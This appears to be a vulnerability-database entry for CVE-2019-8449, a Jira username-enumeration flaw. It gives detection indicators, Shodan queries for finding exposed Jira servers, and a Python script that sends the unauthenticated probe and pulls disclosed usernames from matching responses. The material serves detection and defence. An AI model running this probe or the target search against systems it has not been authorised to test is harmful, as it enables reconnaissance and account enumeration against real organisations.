CVE-2019-8449
published 2019-09-11

Priority: P3 / 59 · Severity: medium · CVSS 3.1 base score: 5.3
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
Exploit: public exploit available
EPSS: 84.77% (99.7th percentile)
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.

Affected (2 ranges)

Vendor     Product  Version range             Fixed in
atlassian  jira     < 8.4.0                   8.4.0
atlassian  jira     >= unspecified, < 8.4.0   8.4.0

Detection & IOCs (extracted from sources)

url:  /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
path: /rest/api/latest/groupuserpicker
  • Send an unauthenticated GET request to /rest/api/latest/groupuserpicker with the query, maxResults and showAvatar parameters. A vulnerable Jira instance (< 8.4.0) responds with HTTP 200 and a JSON body beginning with {"users":{"users": , which confirms unauthenticated username enumeration.
  • Require both conditions: an HTTP 200 status code AND the string {"users":{"users": in the response body. Matching on the status code alone is not sufficient to confirm CVE-2019-8449.
  • Shodan queries can identify exposed Jira instances as targets: http.component:"Atlassian Jira" or cpe:"cpe:2.3:a:atlassian:jira".
  • The exploit requires no authentication and no user interaction (PR:N and UI:N in the CVSS vector). A single unauthenticated GET to the groupuserpicker endpoint with a query parameter is sufficient to trigger the disclosure.
  • Affected versions are Jira 2.1 through 8.3.4 (fixed in 8.4.0). Confirm the target version before testing; patched instances do not return the vulnerable JSON response.
  • If the endpoint does not return a JSON response, the instance is probably patched or the host/path is wrong. The exploit script itself warns that a non-JSON response likely means the instance is not exploitable.
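The check described above, as an added example that is not the page's own code, the exploit script's, or a Nuclei template: it builds the probe URL from the listed parameters, applies the two-part matcher (HTTP 200 AND body prefix {"users":{"users":), and pulls the disclosed usernames out of a matching body. The sample responses are constructed for the example, not captured from a real host, and the base URL jira.example.com is a placeholder; the live probe function only runs when the script is executed directly against a host you are authorized to test.

```python
"""Offline check logic for CVE-2019-8449 (added example, not from the original page).

Mirrors the detection rule: a hit requires HTTP 200 AND a body that begins with
{"users":{"users": . Anything else (login page, error JSON, non-JSON) is a miss.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

ENDPOINT = "/rest/api/latest/groupuserpicker"
MATCH_PREFIX = '{"users":{"users":'


def build_url(base_url: str, query: str = "1", max_results: int = 50000) -> str:
    """Probe URL with the parameters the IOC lists: query, maxResults, showAvatar."""
    params = urllib.parse.urlencode(
        {"query": query, "maxResults": max_results, "showAvatar": "true"}
    )
    return base_url.rstrip("/") + ENDPOINT + "?" + params


def is_vulnerable(status: int, body: str) -> bool:
    """Both conditions must hold; a 200 with a non-matching body is not a hit."""
    return status == 200 and body.lstrip().startswith(MATCH_PREFIX)


def extract_usernames(body: str) -> list:
    """Usernames disclosed by a matching response; [] if the body is not that JSON."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    users = data.get("users", {}).get("users", []) if isinstance(data, dict) else []
    return [u["name"] for u in users if isinstance(u, dict) and "name" in u]


def probe(base_url: str, timeout: float = 10.0):
    """Live, unauthenticated probe (no credentials, consistent with PR:N).
    Only run against systems you are authorized to test."""
    req = urllib.request.Request(
        build_url(base_url), headers={"User-Agent": "cve-2019-8449-check"}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        status, body = e.code, e.read().decode("utf-8", "replace")
    return is_vulnerable(status, body), extract_usernames(body)


# Constructed sample bodies for offline testing (not real captures).
# Key order matters: the vulnerable body must start with {"users":{"users":
VULNERABLE_BODY = json.dumps(
    {
        "users": {
            "users": [
                {"name": "admin", "key": "admin", "displayName": "Administrator"},
                {"name": "jsmith", "key": "jsmith", "displayName": "J. Smith"},
            ],
            "total": 2,
            "header": "Showing 2 of 2 matching users",
        },
        "groups": {
            "groups": [{"name": "jira-administrators"}],
            "total": 1,
            "header": "Showing 1 of 1 matching groups",
        },
    },
    separators=(",", ":"),
)
# A JSON error document of the kind an authenticated-only endpoint returns
# (constructed; the exact wording of a patched Jira is not asserted here).
NON_MATCHING_BODY = '{"errorMessages":["Client must be authenticated."],"errors":{}}'

if __name__ == "__main__":
    print("vulnerable sample:", is_vulnerable(200, VULNERABLE_BODY), extract_usernames(VULNERABLE_BODY))
    print("non-matching sample:", is_vulnerable(200, NON_MATCHING_BODY))
    print("probe URL:", build_url("https://jira.example.com/"))  # placeholder host
```

The matcher deliberately ANDs the two conditions: a 200 for a redirected login page or a JSON error document must not be reported as a hit, which is the false-positive the page's second bullet guards against.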

CVSS provenance

Source  Version  Score  Severity  Vector
nvd     v3.1     5.3    MEDIUM    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvd     v2.0     5.0    MEDIUM    AV:N/AC:L/Au:N/C:P/I:N/A:N
osv     -        7.5    HIGH      -